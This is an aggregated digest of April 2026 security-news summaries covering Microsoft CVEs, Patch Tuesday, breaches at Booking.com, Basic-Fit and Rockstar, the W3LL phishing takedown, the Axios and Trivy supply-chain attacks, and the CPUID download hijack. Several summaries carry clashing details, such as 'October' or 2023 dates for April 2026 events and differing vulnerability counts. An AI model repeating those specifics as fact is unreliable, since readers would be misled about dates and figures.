Information Security News

Zombie Microsoft bugs rise from the dead, pave way for crims and ransomware scum

Date: 2026-04-13 | Source: The Register

Four Microsoft vulnerabilities have been added to CISA's Known Exploited Vulnerabilities catalog. They include CVE-2025-60710 (Windows privilege escalation), CVE-2023-36424 (Windows Common Log File System Driver flaw), CVE-2023-21529 (Microsoft Exchange Server RCE), and CVE-2012-1854 (Visual Basic for Applications RCE). Federal agencies have until April 27 to patch these vulnerabilities, which pose significant risks, especially with ransomware exploitation noted for CVE-2023-21529.

Zombie Microsoft bugs rise from the dead, pave way for crims and ransomware scum

2026-04-14 | The Hacker News: CISA Adds 6 Known Exploited Flaws in Fortinet, Microsoft, and Adobe Software

CISA added six vulnerabilities to its Known Exploited Vulnerabilities catalog, including CVE-2026-21643 (Fortinet, CVSS 9.1), CVE-2020-9715 (Adobe, CVSS 7.8), CVE-2023-36424 (Microsoft, CVSS 7.8), CVE-2023-21529 (Microsoft, CVSS 8.8), CVE-2025-60710 (Microsoft, CVSS 7.8), and CVE-2012-1854 (Microsoft, CVSS 7.8). Active exploitation has been noted for some, with FCEB agencies required to implement fixes by April 27, 2026.

2026-04-14 | Security Affairs: U.S. CISA adds Adobe, Fortinet, Microsoft Exchange Server, and Microsoft Windows flaws to its Known Exploited Vulnerabilities catalog

U.S. CISA added several vulnerabilities to its Known Exploited Vulnerabilities catalog, including CVE-2026-34621 (Adobe Acrobat), CVE-2012-1854 (Microsoft VBA), CVE-2020-9715 (Adobe Acrobat), CVE-2023-21529 (Microsoft Exchange Server), CVE-2023-36424 (Microsoft Windows), CVE-2025-60710 (Microsoft Windows), and CVE-2026-21643 (Fortinet). Federal agencies must address these by April 27, 2026, with CVE-2026-21643 due by April 16, 2026. Prompt patching is essential to mitigate risks.

2026-04-14 | Cyber Security News: CISA Warns of Microsoft Exchange and Windows CLFS Vulnerabilities Exploited in Attacks

CISA has warned of two critical Microsoft vulnerabilities: CVE-2023-21529 in Exchange Server, allowing remote code execution via deserialization of untrusted data, and CVE-2023-36424 in Windows CLFS, enabling local privilege escalation due to improper memory validation. Federal agencies must patch these by April 27, 2026, while private organizations are strongly urged to do the same. Immediate actions include applying patches, monitoring for unusual activity, and considering discontinuation of vulnerable products if necessary.

2026-04-14 | Cyber Security News: Microsoft Patch Tuesday April 2026 – 168 Vulnerabilities Fixed, Including Actively Exploited 0-day

Microsoft's April 2026 Patch Tuesday addresses 168 vulnerabilities, including CVE-2026-32201, a critical SharePoint Server spoofing vulnerability under active exploitation. CVE-2026-33825, a Microsoft Defender elevation of privilege vulnerability, is also highlighted due to public disclosure. Key patches include critical RCE vulnerabilities in Windows TCP/IP and Active Directory. Security teams are urged to prioritize these patches, especially CVE-2026-32201, to mitigate risks. Immediate action is recommended across various Microsoft products.

2026-04-14 | Cyberscoop: Microsoft drops its second-largest monthly batch of defects on record

Microsoft addressed 165 vulnerabilities in its October Patch Tuesday update, marking its second-largest monthly release. Notably, CVE-2026-32201, a zero-day in Microsoft Office SharePoint, allows unauthenticated attackers to view and alter sensitive information. CISA added it to its exploited vulnerabilities catalog. Another high-severity flaw, CVE-2026-33825 in Microsoft Defender, could enable local privilege escalation. Microsoft also disclosed two critical vulnerabilities, CVE-2026-33824 and CVE-2026-26149, but deemed them less likely to be exploited.

2026-04-14 | Cisco Talos: Microsoft Patch Tuesday for April 2026 - Snort Rule and Prominent Vulnerabilities

Microsoft's April 2026 Patch Tuesday addresses 165 vulnerabilities, including eight critical ones. Notable CVEs include CVE-2026-23666 (DoS in .NET), CVE-2026-32157 (code execution in Remote Desktop Client), and CVE-2026-33824 (remote code execution in IKE). Additional vulnerabilities affect Microsoft Office and Windows components, with some already exploited in the wild. Talos has released a new Snort rule set to detect exploitation attempts, urging users to update their security rules.

2026-04-14 | The Register: Microsoft's massive Patch Tuesday: It's raining bugs

Microsoft's April Patch Tuesday addressed 165 new CVEs, including CVE-2026-32201, a spoofing vulnerability in SharePoint Server under active exploitation. This flaw allows unauthorized attackers to manipulate information presentation, potentially aiding phishing and social engineering attacks. Another notable bug, CVE-2026-33825, is an elevation of privilege vulnerability in Microsoft Defender, linked to exploit code published by a researcher. Users are advised to test and deploy fixes promptly.

2026-04-14 | Krebs on Security: Patch Tuesday, April 2026 Edition

Microsoft's April 2026 Patch Tuesday addressed 167 vulnerabilities, including a SharePoint Server zero-day (CVE-2026-32201) that allows content spoofing, increasing phishing risks. An SQL Server vulnerability (CVE-2026-33120) enables remote code execution. Windows Defender's privilege escalation flaw (CVE-2026-33825) was also patched. Adobe fixed an actively exploited flaw (CVE-2026-34621). This month saw a record number of patches, attributed to enhanced AI capabilities in vulnerability detection. Users are advised to restart browsers to apply updates.

2026-04-14 | Rapid7: Patch Tuesday - April 2026

On April 2026 Patch Tuesday, Microsoft published 167 vulnerabilities, with 19 deemed likely to be exploited. Notably, CVE-2026-32201 is a spoofing vulnerability in SharePoint, and CVE-2026-33825 is a local privilege escalation vulnerability in Microsoft Defender. CVE-2026-33824 is a critical unauthenticated remote code execution vulnerability in Windows IKE Services. Patches are available for all affected software, and Microsoft lifecycle support updates were also announced, affecting various legacy tools.

2026-04-15 | Cyber Security News: Microsoft SharePoint Server 0-Day Vulnerability Actively Exploited in Attacks

A critical zero-day spoofing vulnerability in Microsoft SharePoint Server, tracked as CVE-2026-32201, is actively exploited, confirmed by Microsoft on April 14, 2026. It affects multiple SharePoint versions with a CVSS score of 6.5. The flaw allows unauthenticated remote attackers to perform spoofing attacks. Microsoft released emergency patches for affected versions and recommends immediate application, auditing access logs, and restricting external-facing instances. Organizations should monitor for indicators of compromise.

Booking.com warns customers of hack that exposed their data

Date: 2026-04-13 | Source: The Guardian

Booking.com experienced a data breach where unauthorized parties accessed customer booking information. The company noted suspicious activity and updated reservation PINs to contain the issue, informing affected guests. While financial information was not compromised, accessed data may include booking details, names, emails, addresses, and phone numbers. Booking.com reported the breach to the Dutch privacy regulator 22 days late, resulting in a €475,000 fine. The company has faced increasing online scams and previous phishing incidents.

Booking.com warns customers of hack that exposed their data

2026-04-13 | Security Magazine: Booking.com Customer Data Hacked, Exposed

Booking.com experienced a data breach, exposing customer booking information. Unauthorized third parties accessed data, prompting the company to change reservation PINs and notify guests. While financial information remains secure, compromised data may include names, emails, phone numbers, and addresses. The extent of the impact on customers is currently undisclosed. Booking.com, based in Amsterdam, lists over 2 million properties worldwide.

2026-04-13 | The Register: Booking.com warns reservation data may have checked out with intruders

Booking.com has alerted customers that their reservation details may have been accessed by unauthorized parties. The exposed data includes names, contact details, reservation dates, and messages exchanged with hotels. While financial data was not compromised, the company warned of increased phishing risks due to the nature of the data. Booking.com reset booking PINs as a precaution but did not disclose the number of affected users or how the breach occurred. This incident follows a previous breach in 2021 involving hotel staff logins.

2026-04-13 | TechCrunch: Booking.com confirms hackers accessed customers’ data

Booking.com confirmed that hackers accessed customers' personal data, including names, emails, addresses, phone numbers, and booking details. The company notified affected customers of the breach, stating that unauthorized third parties accessed certain booking information. Affected users reported receiving phishing messages via WhatsApp containing their booking details. Booking.com has since updated reservation PINs and assured that financial information was not compromised. Specific details on the number of affected customers were not disclosed.

2026-04-13 | Security Affairs: Hackers access Booking.com user data, company secures systems

Hackers accessed Booking.com user data, including names, emails, phone numbers, and booking details. The incident has been contained, and the company reset reservation PINs. No payment data was compromised. Booking.com has notified affected users and advised them to be vigilant against phishing attempts, as scammers have reportedly contacted users with real reservation details. The extent of the impact and the method of the attack remain unclear.

2026-04-13 | Tomsguide: Booking.com confirms massive data breach that could impact millions of travelers — how to stay safe

Booking.com has confirmed a data breach affecting customer reservation data, including full names, email and postal addresses, and phone numbers. The company has reset PINs for affected reservations and will notify impacted users via email. While the number of affected individuals remains undisclosed, millions may be at risk. Users are advised to be cautious of phishing attempts and consider identity theft protection services, although it is unclear if Booking.com is offering any.

2026-04-14 | Times Now: Massive Booking.com Data Breach Confirmed, Millions At Risk: Check If You’re Affected

A data breach at Booking.com has been confirmed, putting millions of users at risk. Affected individuals are advised to change their passwords and check their reservation details, including updating their PINs. Booking.com asserts that the situation is currently under control, but this incident highlights vulnerabilities even in major platforms.

2026-04-14 | Cyber Security News: Booking.com Confirms Data Breach — Hackers Accessed Customers’ Personal Information

Booking.com confirmed a data breach where unauthorized third parties accessed customers' personal information, including names, email addresses, phone numbers, and reservation details. The company reset PINs for affected reservations and notified impacted guests. While financial information was reportedly not accessed, concerns arise as evidence suggests stolen data is being used for phishing attacks. Users are advised to remain vigilant against unsolicited requests and verify communications through official channels.

2026-04-14 | TechRadar: Booking.com confirms reservation data breach — tells customers hackers 'may have been able to access certain booking information'

Booking.com has confirmed a data breach affecting users' reservation details, potentially exposing names, emails, addresses, and phone numbers. The company has reset reservation PINs and warned users about possible phishing attacks related to recent bookings. Reports indicate that the breach may involve information from bookings made within the past week. Booking.com, a highly visited travel platform, is a significant target for cybercriminals.

2026-04-14 | Hack Read: Booking.com Confirms Data Breach as Hackers Access Customer Details

Booking.com has confirmed a data breach where a third party accessed customer reservation data, including names, email addresses, phone numbers, and postal addresses, but not payment information. The company has reset PIN codes and warned users about potential phishing attempts using the exposed data. The breach's specifics, including the number of affected users, remain undisclosed. Experts caution that the lack of details increases the risk of phishing and identity fraud.

2026-04-14 | Help Net Security: Booking.com data breach: Customer reservation data exposed

Booking.com experienced a data breach where unauthorized third parties accessed customer reservation data, including names, emails, addresses, and phone numbers. Financial information was not compromised. The company has contained the issue and updated booking PINs for affected users. Customers reported phishing attempts using personal details linked to the breach. The Vect hacking group claimed responsibility, but this remains unconfirmed. Users are advised to be vigilant against potential scams.

Basic-Fit Data Breach Exposes Millions of Users Across Multiple Countries

Date: 2026-04-13 | Source: Cyber Security News

Basic-Fit confirmed a data breach affecting approximately 1 million members, with around 200,000 in the Netherlands. The breach involved unauthorized access to membership systems, exposing sensitive data including names, addresses, emails, phone numbers, dates of birth, and bank account details. No identity documents or passwords were compromised. Basic-Fit notified the Dutch Data Protection Authority and affected members. Experts advise vigilance against phishing and monitoring bank statements for anomalies. Investigations are ongoing.

Basic-Fit Data Breach Exposes Millions of Users Across Multiple Countries

2026-04-13 | The Register: Gym giant Basic-Fit confirms data on a million members stolen in cyberattack

Basic-Fit confirmed that data, including bank details, of approximately one million members was stolen in a cyberattack. The breach affected members in six countries: the Netherlands, Belgium, France, Germany, Luxembourg, and Spain. Basic personal information was compromised, but passwords and identity documents were not accessed. The company has notified relevant authorities and is investigating the incident. Customers are advised to be vigilant against phishing attempts.

2026-04-14 | TechRadar: Basic-Fit gym group data breach exposes details of over 1 million members — here's what we know

Basic-Fit has confirmed a data breach affecting approximately 1 million customers across six countries, including the Netherlands, Belgium, Luxembourg, France, Spain, and Germany. Stolen data includes names, contact details, dates of birth, and bank information, but no passwords or IDs were exposed. The breach was detected quickly, and while there is no evidence of data misuse, phishing risks are anticipated. Basic-Fit has notified relevant data protection authorities regarding the unauthorized access.

2026-04-14 | Help Net Security: Basic-Fit hack compromises data of up to 1 million members

Basic-Fit, a European gym chain, reported a data breach affecting up to 1 million members across several countries, including the Netherlands, Belgium, Luxembourg, France, Spain, and Germany. The breach exposed personal data such as names, addresses, email addresses, phone numbers, dates of birth, and bank account details, but not passwords or identification documents. Basic-Fit detected the unauthorized access quickly and has informed affected members to be vigilant against phishing attempts.

2026-04-14 | Security Affairs: Personal data of 1 million gym members compromised in Basic-Fit security incident

A data breach at Basic-Fit has compromised the personal data of approximately 1 million gym members, including names, birth dates, and bank details. The unauthorized access was detected on April 14, 2026, and affected members in several countries, notably around 200,000 in the Netherlands. Basic-Fit has notified the relevant data protection authority and is investigating the incident. No ID documents or passwords were accessed, and there is currently no evidence of data misuse.

FBI Atlanta and Indonesian National Police Take Down W3LLSTORE Phishing Marketplace

Date: 2026-04-12 | Source: Hack Read

The FBI Atlanta Field Office and Indonesian National Police dismantled the W3LLSTORE phishing marketplace, linked to over $20 million in fraud. The operation, using the W3LL phishing kit, allowed cybercriminals to create fake login pages and sell stolen credentials. From 2019 to 2023, it facilitated over 25,000 compromised accounts. Following its closure, the service continued via encrypted platforms. The kit was involved in over 17,000 global attacks, primarily targeting the U.S., with significant impacts on manufacturing and technology sectors.

FBI Atlanta and Indonesian National Police Take Down W3LLSTORE Phishing Marketplace

2026-04-13 | Infosecurity Magazine: FBI Dismantles $20m Phishing Operation W3LL

US and Indonesian law enforcement dismantled the W3LL phishing network, responsible for over $20 million in fraud. The FBI seized the w3ll.store domain, which sold a phishing kit enabling impersonation of legitimate login pages. Active from 2019 to 2023, the marketplace facilitated over 25,000 compromised accounts. The operation continued via encrypted messaging apps, potentially targeting over 17,000 victims globally. The threat actor, identified as ‘G.L.,’ had been active since at least 2017.

2026-04-13 | The Hacker News: FBI and Indonesian Police Dismantle W3LL Phishing Network Behind $20M Fraud Attempts

The FBI and Indonesian Police have dismantled the W3LL phishing network, which attempted over $20 million in fraud by stealing account credentials using a toolkit sold for about $500. The alleged developer, G.L., was detained, and key domains were seized. The W3LL phishing kit allowed criminals to create fake login pages, targeting primarily Microsoft 365 credentials. Between 2019 and 2023, over 25,000 compromised accounts were sold. The operation continued even after the W3LL Store's shutdown in 2023.

2026-04-13 | Cybersecurity Dive: US, Indonesia shut down ‘sophisticated’ phishing kit

The FBI and Indonesian law enforcement dismantled the W3LL phishing kit, a global cybercrime tool that allowed hackers to create fake login portals for popular services. The operation led to the arrest of the kit's developer, G.L., and the seizure of its infrastructure. W3LL facilitated over $20 million in fraud and was used against 17,000 victims from 2023 to 2024. This takedown marks a significant international law enforcement collaboration against cybercrime.

2026-04-13 | Recorded Future: FBI, Indonesia take down W3LL phishing tool

The FBI and Indonesian law enforcement disrupted the W3LL phishing tool, a service enabling hackers to create fake login portals for $500. The FBI seized infrastructure and arrested the alleged developer, G.L. W3LL facilitated access to over 25,000 compromised accounts, leading to $20 million in fraud. It targeted 56,000 corporate Microsoft 365 accounts from October 2022 to July 2023. Despite its shutdown, the tool persisted through encrypted platforms, affecting 17,000 victims globally from 2023 to 2024.

2026-04-13 | TechCrunch: FBI announces takedown of phishing operation that targeted thousands of victims

The FBI announced the takedown of a global phishing operation named W3LL, which targeted over 17,000 victims. The operation's website was seized, and the alleged developer, G.L., was detained. Cybercriminals used a $500 phishing kit to create fake login pages, attempting over $20 million in fraud. The marketplace also facilitated the sale of more than 25,000 compromised accounts. The FBI collaborated with Indonesian police in this operation.

2026-04-13 | CNET: The Feds Took Down a 'Full-Service Cybercrime Platform' Behind $20M in Phishing

The FBI and Indonesian National Police dismantled the W3LL phishing kit, a cybercrime platform responsible for approximately $20 million in fraud. Active since 2019, the kit targeted Microsoft 365 accounts and allowed criminals to bypass multi-factor authentication. The FBI estimates over 25,000 compromised accounts were housed in the W3LL marketplace, with an additional 17,000 accounts compromised in 2023-2024. The developer, known as G.L, has been detained, but similar tools may still exist.

2026-04-14 | Cyber Security News: W3LL Phishing Kit Takedown Hits Global Credential Theft and MFA Bypass Operation

The FBI, in collaboration with Indonesian law enforcement, dismantled the W3LL phishing kit, a global operation enabling MFA bypass and over $20 million in fraud attempts. The kit, sold for $500, allowed attackers to harvest credentials and session tokens, facilitating unauthorized access. The W3LLSTORE marketplace sold over 25,000 compromised accounts from 2019 to 2023. The operation led to the arrest of the developer and seizure of critical infrastructure, disrupting a significant cybercrime resource.

2026-04-14 | Help Net Security: W3LL phishing service sold for $500 dismantled by the FBI

The FBI and Indonesian authorities dismantled the W3LL phishing kit, a tool for creating fake login pages to steal credentials, linked to over $20 million in fraud. For $500, users accessed the kit to bypass MFA and capture session data. The operation, tied to the W3LLSTORE marketplace, sold over 25,000 accounts from 2019 to 2023. After W3LLSTORE's closure, the kit was rebranded and used against 17,000 victims globally in 2023-2024. Reported losses from cyber-enabled fraud reached $17.7 billion in 2025.

2026-04-14 | TechRadar: 'This wasn’t just phishing — it was a full-service cybercrime platform': FBI reveals takedown of notorious W3LL phishing operation targeting thousands of victims

The FBI, in collaboration with Indonesian police, has detained an individual linked to the W3LL phishing kit, a platform that facilitated credential theft and attempted $20 million in fraud. The kit, priced at $500, enabled the creation of spoofed websites and phishing emails. Additionally, the W3LLSTORE marketplace sold over 25,000 compromised accounts. Law enforcement seized key infrastructure and domains, significantly disrupting this cybercrime operation targeting over 17,000 victims globally.

Two different attackers poisoned popular open source tools - and showed us the future of supply chain compromise

Date: 2026-04-11 | Source: The Register

Two supply chain attacks in March targeted open-source tools Trivy and Axios, compromising tens of thousands of organizations. TeamPCP injected malware into Trivy, stealing CI/CD secrets and credentials from over 10,000 organizations. Meanwhile, a North Korean group hijacked Axios to deliver a remote-access trojan, affecting users who downloaded compromised packages. Experts emphasize the need for software bill-of-materials (SBOMs) and rapid detection strategies to mitigate risks from such attacks.

Two different attackers poisoned popular open source tools - and showed us the future of supply chain compromise

2026-04-11 | Cyber Security News: OpenAI Warns macOS Users to Update ChatGPT and Codex Immediately

OpenAI disclosed a security incident on March 31, 2026, involving a compromise of the Axios JavaScript library, linked to North Korean threat actors. Malicious updates introduced a Remote Access Trojan in versions v1.14.1 and v0.30.4, affecting OpenAI's macOS applications. While no user data was compromised, OpenAI is revoking all macOS security certificates and requiring users to update applications by May 8, 2026. Recommendations include implementing dependency pinning and workflow audits to mitigate supply chain attack risks.

2026-04-13 | The Hacker News: OpenAI Revokes macOS App Certificate After Malicious Axios Supply Chain Incident

OpenAI revoked its macOS app signing certificate after a supply chain attack involving the Axios library on March 31. The attack, attributed to North Korean group UNC1069, involved malicious versions of Axios that deployed a backdoor. OpenAI found no evidence of data exfiltration but is treating the certificate as compromised. Older macOS apps will lose support by May 8, 2026. The incident highlights risks in software supply chains, prompting recommendations for enhanced security measures.

2026-04-13 | TechRadar: OpenAI flags third-party data issue — all macOS users should update now

OpenAI rotated its macOS code-signing certificate following a breach at Axios, a third-party tool it uses, which led to a malicious version (1.14.1) being integrated into its app-signing workflow. Although there is no evidence of data theft, OpenAI deprecated older app versions and warned that they will cease receiving updates after May 8, 2026. The affected applications include ChatGPT Desktop, Codex, Codex-cli, and Atlas. User data remains secure, and no alterations to the software were detected.

2026-04-13 | Hack Read: OpenAI Rotates macOS Certificates Following Axios Supply Chain Breach

OpenAI rotated its macOS code-signing certificates after a supply chain attack compromised the Axios library on 31 March 2026. Hackers accessed the account of lead developer Jason Saayman, leading to the release of malicious Axios versions 1.14.1 and 0.30.4 containing a backdoor. OpenAI's internal systems fetched this compromised code, prompting the revocation of certificates for affected apps: ChatGPT Desktop, Codex, Codex-cli, and Atlas. New versions are required by 8 May 2026 to avoid security risks. The attack is linked to the North Korea-associated group UNC1069.

2026-04-13 | Cyberscoop: OpenAI’s Mac apps need updates thanks to the Axios hack

OpenAI updated its macOS applications following a supply-chain attack that compromised the Axios library, requiring users to upgrade to the latest versions. Although no user data was accessed, OpenAI is treating its security certificate as compromised due to the incident. The attack, attributed to a North Korean group, lasted three hours before the malicious software was removed. Older app versions may lose functionality after the certificate revocation on May 8. OpenAI has corrected the misconfiguration in its GitHub workflow.

ShinyHunters Claims Rockstar Games Snowflake Breach via Anodot

Date: 2026-04-11 | Source: Hack Read

On April 11, 2026, the ShinyHunters hacking group claimed to have accessed Rockstar Games' Snowflake environment via a breach at Anodot, a SaaS platform. They threatened to leak data unless a ransom was paid by April 14. The attackers reportedly extracted authentication tokens from Anodot, allowing them to access Snowflake accounts without exploiting vulnerabilities. Rockstar has not yet commented on the claims, which highlight risks associated with cloud integrations and exposed access controls.

ShinyHunters Claims Rockstar Games Snowflake Breach via Anodot

2026-04-12 | Times Now: GTA 6 Data Breached By Shiny Hunters? All You Need To Know

On April 11, a message was posted on a dark web leak site by Shiny Hunters, claiming a breach of Rockstar Games' data via Anodot, a SaaS platform for cloud cost monitoring. The attackers set a deadline of April 14, 2026, threatening public exposure if their demands were not met. They warned that failure to comply would lead to additional digital issues for Rockstar Games, urging them to act to avoid becoming a headline.

2026-04-13 | TechRadar: Rockstar confirms major third-party data breach: GTA VI maker says 'no impact on our organization or our players'

Rockstar Games confirmed a data breach linked to the Anodot supply chain attack by the ShinyHunters cybercrime group, which accessed limited non-material company information. ShinyHunters demands a ransom by April 14, 2026, threatening to leak the stolen files otherwise. Rockstar stated there is no impact on their organization or players, and the nature of the accessed data remains unclear. ShinyHunters has previously targeted major companies like Microsoft and Cisco.

2026-04-13 | The Register: Rockstar Games gets a taste of grand theft data

ShinyHunters claims to have compromised Rockstar Games' data through a third-party breach involving Anodot, a cloud cost-monitoring tool. They threatened to leak data unless contacted by April 14, 2026. Rockstar confirmed a limited amount of non-material information was accessed but stated there was no impact on players. The breach reportedly involved the misuse of authentication tokens, highlighting vulnerabilities in SaaS integrations. ShinyHunters has a history of targeting APIs and identity systems.

2026-04-13 | Help Net Security: Rockstar Games receives “pay or leak” warning after cyberattack

Rockstar Games confirmed a cyberattack by the hacking group ShinyHunters, which accessed its Snowflake environment via the Anodot platform. The attackers extracted authentication tokens, allowing access to the Snowflake account. On April 11, ShinyHunters threatened to leak the data unless paid by April 14. Anodot reported issues with its connectors on April 4. Rockstar stated that only a limited amount of non-material information was accessed, with no impact on the organization or players.

2026-04-13 | DIGIT: Rockstar Games Suffers Hack in Third-party Cloud Breach

Rockstar Games experienced a breach due to a third-party cloud vendor, with the ransomware group ShinyHunters claiming access to compromised data. The breach involved Rockstar's Snowflake servers, allegedly due to a vulnerability from Anodot, a cloud analytics service. Rockstar confirmed a limited amount of non-material company information was compromised but stated there was no impact on the organization or its players. The nature of the accessed data is believed to be internal commercial information, not personal data.

2026-04-13 | Recorded Future: Hackers claim breach of Rockstar Games via cloud analytics platform

The ShinyHunters cybercrime group has claimed a breach of Rockstar Games via the Anodot cloud analytics platform, threatening to release stolen data unless a ransom is paid by April 14. Rockstar confirmed limited non-material data was accessed but downplayed the impact. The breach involved authentication tokens from Anodot, allowing access to customer Snowflake accounts. This incident follows a broader supply-chain compromise affecting multiple Snowflake customers. ShinyHunters has a history of targeting major companies for financial gain.

2026-04-13 | TechCrunch: Hack at Anodot leaves over a dozen breached companies facing extortion

Hackers from the ShinyHunters group breached Anodot on April 4, stealing authentication tokens and customer data from at least a dozen companies, including Rockstar Games. Anodot's data connectors failed, preventing customer access to cloud data. Snowflake cut off access after detecting unusual activity. ShinyHunters are known for extorting victims and using social engineering to gain access to corporate networks. The breach highlights vulnerabilities in software used by major corporations for data storage and analysis.

2026-04-13 | The Guardian: Hacker group threatens to release Grand Theft Auto VI data in Rockstar Games attack

Rockstar Games has been targeted by the hacker group ShinyHunters, which threatens to release stolen data unless a ransom is paid by 14 April 2026. The group claims to have accessed company servers operated by a third party. Rockstar stated that only non-material company information was compromised and that player data remains secure. ShinyHunters is linked to previous attacks on companies like Microsoft and Cisco. This incident follows a prior breach in 2022, where in-development footage of Grand Theft Auto VI was leaked.

2026-04-13 | CNET: Grand Theft Data: Hackers Demand Ransom Payment From Rockstar Games

On April 11, 2023, Rockstar Games confirmed a data breach involving its third-party provider Anodot, exploited by the ShinyHunters ransomware group. The hackers accessed corporate information, including contracts and financial documents, but claimed player data remains safe. They threatened to release the stolen data on April 14 unless a ransom is paid. ShinyHunters has previously targeted major companies, raising concerns about the impact on game development and internal assets.

2026-04-14 | Cyber Security News: Rockstar’s GTA Game Hacked – Attackers published 78.6 Million Records Online

Rockstar Games experienced a data breach on April 14, 2026, when the hacking group ShinyHunters exploited a third-party integration with Anodot to access its Snowflake data warehouse, leaking over 78.6 million records. The attackers extracted authentication tokens from Anodot, allowing them to impersonate internal services. No vulnerabilities in Snowflake were exploited. The leaked data included analytics on GTA Online and Red Dead Online, but no sensitive player information was compromised. Security teams are advised to audit SaaS integrations and monitor for anomalies.

2026-04-14 | TechRadar: Rockstar hackers publish 78.6 million stolen records — but many of us will be disappointed

Hackers from the ShinyHunters group have leaked over 78.6 million records stolen from Rockstar Games, primarily consisting of business and financial data rather than game-related information. The breach, linked to an Anodot supply chain attack, exposed internal analytics, game economy data, and customer support metrics. Rockstar confirmed the breach, stating the stolen data was non-material and had no significant impact on the organization or its players. The hackers threatened further leaks if demands were not met.

2026-04-14 | Security Affairs: ShinyHunters claim the hack of Rockstar Games breach and started leaking data

An 8.1GB data leak linked to Rockstar Games has emerged, reportedly shared by the cybercrime group ShinyHunters. The leaked data includes anti-cheat source code, player analytics, game assets, and financial information, allegedly obtained via a third-party cloud provider. Rockstar Games stated that only a limited amount of non-sensitive information was accessed and that core systems were not compromised. This incident highlights the rising threat of attacks targeting third-party cloud environments.

Gmail’s end-to-end encryption comes to mobile, no extra apps required

Date: 2026-04-10 | Source: Help Net Security

Google has introduced client-side encryption for Gmail on Android and iOS, enabling Enterprise Plus users with Assured Controls to send and receive encrypted messages without additional apps. This feature allows users to maintain compliance while accessing sensitive data on mobile devices. Encrypted messages appear as standard threads in Gmail, and recipients can access them via web browsers. Admins must enable mobile access for this feature in the Admin Console, while users can activate encryption by selecting a lock icon when composing messages.

Gmail’s end-to-end encryption comes to mobile, no extra apps required

2026-04-10 | CNET: Encrypted Emails Are Now Available for Some Gmail Phone App Enterprise Customers

Google has introduced end-to-end encryption (E2EE) for Gmail app users on iOS and Android, available exclusively to Enterprise Plus subscribers with Assured Controls or Assured Controls Plus. This feature allows users to send and receive encrypted emails directly within the app, enhancing data security and compliance. Recipients can read and reply to encrypted emails even if they do not use Gmail. Administrators must enable this feature in the Admin Console for users to access it.

2026-04-10 | CSO Online: Google adds end-to-end Gmail encryption to Android, iOS devices for enterprises

Google has extended end-to-end encryption for Gmail to Android and iOS devices, enhancing client-side encryption (CSE) for enterprise users. Gartner analyst Avivah Litan noted that this update is significant amid concerns over WhatsApp's encryption, as it provides verifiable customer-managed keys, ensuring that Google cannot access encrypted content. This move addresses issues highlighted in a January 2026 lawsuit against Meta concerning internal access to customer encrypted message data.

2026-04-11 | Cyber Security News: Google Launches Gmail End-to-End Encryption for Android and iOS Users

Google has launched End-to-End Encryption (E2EE) for its Gmail app on Android and iOS, enabling organizations to manage sensitive data securely from mobile devices. This feature ensures compliance with data sovereignty regulations and allows users to compose and read encrypted messages natively without third-party apps. Administrators must enable mobile clients in the Workspace Admin Console. The update is available now for Enterprise Plus accounts, supporting seamless communication with non-Gmail users.

CPUID Website Compromised to Deliver Weaponized HWMonitor and CPU-Z Tools

Date: 2026-04-10 | Source: Cyber Security News

The cpuid.com website has been compromised, delivering trojanized versions of HWMonitor 1.63 and CPU-Z since early April 2026. Users reported downloading a malicious file named HWiNFO_Monitor_Setup.exe instead of the expected hwmonitor_1.63.exe. The malware employs DLL hijacking and in-memory execution to evade detection. Download links are currently returning 404 errors, and CPUID is investigating. Users are advised not to download from cpuid.com and to scan for cryptbase.dll if downloaded after April 3, 2026.

CPUID Website Compromised to Deliver Weaponized HWMonitor and CPU-Z Tools

2026-04-10 | The Register: CPUID site hijacked to serve malware instead of HWMonitor downloads

The CPUID website was compromised for approximately six hours between April 9 and April 10, 2023, redirecting users attempting to download HWMonitor and CPU-Z to malicious installers. The breach involved a compromised backend component, not the software builds themselves. The malware targeted 64-bit HWMonitor users, utilizing a fake CRYPTBASE.dll to connect to a command-and-control server and execute additional payloads, including attempts to access browser data. CPUID has since resolved the issue.

2026-04-12 | The Hacker News: CPUID Breach Distributes STX RAT via Trojanized CPU-Z and HWMonitor Downloads

Unknown threat actors compromised CPUID from April 9, 15:00 UTC, to April 10, 10:00 UTC, serving malicious executables for CPU-Z and HWMonitor. The breach involved a secondary API compromise, leading to the distribution of STX RAT via trojanized software. The malicious DLL, named 'CRYPTBASE.dll', executed additional payloads and performed anti-sandbox checks. Over 150 victims, including individuals and organizations in various sectors, were identified, primarily in Brazil, Russia, and China.

2026-04-13 | Risky.Biz: Risky Bulletin: France takes first steps to ditch Windows for Linux

The CPUID software project was hacked, leading to malware being added to the CPU-Z and HWMonitor download links for six hours. Security researchers linked the breach to a known cybercrime group distributing malware-laced apps. OpenAI rotated its notarization certificate after the Axios supply chain attack, while the Silent ransom group leaked data from law firm Orrick, Herrington & Sutcliffe. Rockstar Games was also hacked again, facing extortion from the ShinyHunters group.

2026-04-13 | Security Affairs: CPUID watering hole attack spreads STX RAT malware

On April 9, 2026, the CPUID website was compromised, redirecting download links for CPU-Z and HWMonitor to malicious domains for approximately six hours. Attackers distributed STX RAT via trojanized installers containing a malicious DLL, enabling remote access. Kaspersky identified over 150 victims, primarily in Brazil, Russia, and China. The attack reused infrastructure from a previous campaign, leading to easier detection. Recommendations include checking DNS logs for signs of infection.

2026-04-13 | TechRadar: 'This is not your typical run-of-the-mill malware': CPUID download page hacked and tools replaced with links to malicious files

CPUID.com was compromised for about six hours between April 9 and April 10, serving malicious download links for legitimate software, including CPU-Z and HWMonitor. The malware, identified as a sophisticated Trojan, utilized DLL sideloading with a malicious DLL named 'CRYPTBASE.dll' for command and control connections. It evaded detection by 20 antivirus engines and was described as deeply trojanized and multi-staged. The website has since been secured, and the original files remain uncompromised.

2026-04-13 | Help Net Security: Hackers hijacked CPUID downloads, served STX RAT to victims

Hackers compromised CPUID's website for about six hours from April 9 to April 10, redirecting downloads to malicious links that served the STX RAT, a remote access trojan. The original signed files were not affected. The malware targets browser credentials, crypto-wallets, and FTP client credentials. Over 150 victims, including individuals and organizations in sectors like retail and telecommunications, were identified, primarily in Brazil, Russia, and China. Users are advised to check for malicious files and change compromised credentials.

Marimo RCE Flaw CVE-2026-39987 Exploited Within 10 Hours of Disclosure

Date: 2026-04-10 | Source: The Hacker News

